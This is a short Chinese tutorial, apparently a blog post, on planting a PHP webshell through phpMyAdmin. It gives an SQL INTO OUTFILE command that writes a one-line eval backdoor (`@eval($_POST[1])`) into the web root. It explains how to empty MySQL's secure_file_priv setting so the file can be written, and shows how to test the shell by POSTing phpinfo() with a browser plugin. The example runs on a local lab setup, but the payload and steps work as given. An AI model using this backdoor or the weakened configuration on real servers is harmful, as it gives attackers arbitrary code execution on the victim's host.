通过phpMyAdmin写入MySQL,获取webshell
在SQL的控制台中输入
进入http://127.0.0.1/phpMyAdmin,并在SQL中输入如下命令
select '<?php @eval($_POST[1]);?>' into outfile 'D:/phpstudy_pro/WWW/code/sql/shell.php';
发现如下报错:
修改配置
去掉导入的目录限制
可修改mysql配置文件(Windows下为my.ini, Linux下的my.cnf),在[mysqld]下面,查看是否有:
secure_file_priv =
如上这样一行内容,如果没有,则手动添加。如果存在如下行:
secure_file_priv = /home
这样一行内容,表示限制为/home文件夹。而如下行:
secure_file_priv =
这样一行内容,表示不限制目录,等号一定要有,否则mysql无法启动。
修改完配置文件后,重启mysql生效。
重启后:
关闭:service mysqld stop
启动:service mysqld start
再次输入
select '<?php @eval($_POST[1]);?>' into outfile 'D:/phpstudy_pro/WWW/code/sql/shell.php';
查看木马是否可以执行
同过访问木马的地址,并通过 hackbar插件,在post中输入 1=phpinfo(),查看此木马是否可以使用;
其他方式写入shell:https://blog.csdn.net/weixin_39872872/article/details/112589789